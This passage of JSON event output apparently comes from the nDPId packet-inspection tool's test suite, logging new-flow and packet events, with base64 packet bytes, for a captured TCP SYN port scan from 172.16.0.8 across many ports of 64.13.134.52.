+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoQAACoG++6sEAAIQA2GNIzTGfbdU4MZAAAAAGACDAASlgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAseo0AACUGqOWsEAAIQA2GNIzTCAHdU4MZAAAAAGACCAAoiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsWkgAADkGtSqsEAAIQA2GNIzTAFXdU4MZAAAAAGACCAAwNwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsjOIAACoGkZCsEAAIQA2GNIzTCBHdU4MZAAAAAGACDAAkewAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsawEAAC4Gr3GsEAAIQA2GNIzTAnHdU4MZAAAAAGACDAAqGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061308,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_packet_id":1,"flow_last_seen":1278275061308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061308,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/QAADkGW36sEAAIQA2GNIzTCMvdU4MZAAAAAGACCAAnwQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsePMAACYGqX+sEAAIQA2GNIzTFGndU4MZAAAAAGACDAAYIwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAskrwAAC8GhrasEAAIQA2GNIzTC8XdU4MZAAAAAGACEAAcxwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsiUkAADMGjCmsEAAIQA2GNIzTwAjdU4MZAAAAAGACEABogwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsOr4AADkG1LSsEAAIQA2GNIzTHvDdU4MZAAAAAGACCAARnAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLsAADEG8resEAAIQA2GNIzTAq\/dU4MZAAAAAGACCAAt3QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxiMAACoGWE+sEAAIQA2GNIzTDSzdU4MZAAAAAGACDAAfYAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsI\/AAACUG\/4KsEAAIQA2GNIzTAYXdU4MZAAAAAGACCAAvBwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAswtYAADYGT5ysEAAIQA2GNIzTgAfdU4MZAAAAAGACDACshAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsWhoAACcGx1isEAAIQA2GNIzTD6HdU4MZAAAAAGACEAAY6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsS5QAAC8Gzd6sEAAIQA2GNIzTBwndU4MZAAAAAGACEAAhgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsHecAADsG74usEAAIQA2GNIzTCi\/dU4MZAAAAAGACEAAeXQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZwAADUGxdasEAAIQA2GNIzTFi7dU4MZAAAAAGACCAAaXgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsKBoAADoG5lisEAAIQA2GNIzTDmndU4MZAAAAAGACDAAeIwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADMGT5ysEAAIQA2GNIzTC2jdU4MZAAAAAGACEAAdJAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsPDwAACgG5DasEAAIQA2GNIzSJxzdUoMYAAAAAGACBAANcwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsPEQAADsG0S6sEAAIQA2GNIzSA\/3dUoMYAAAAAGACEAAkkgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7EAACcGlcGsEAAIQA2GNIzS6nTdUoMYAAAAAGACEAA+GgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGYAADIGigysEAAIQA2GNIzSE4bdUoMYAAAAAGACDAAZCQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsgZEAADgGjuGsEAAIQA2GNIzSE4rdUoMYAAAAAGACBAAhBQAAAgQFtA=="} 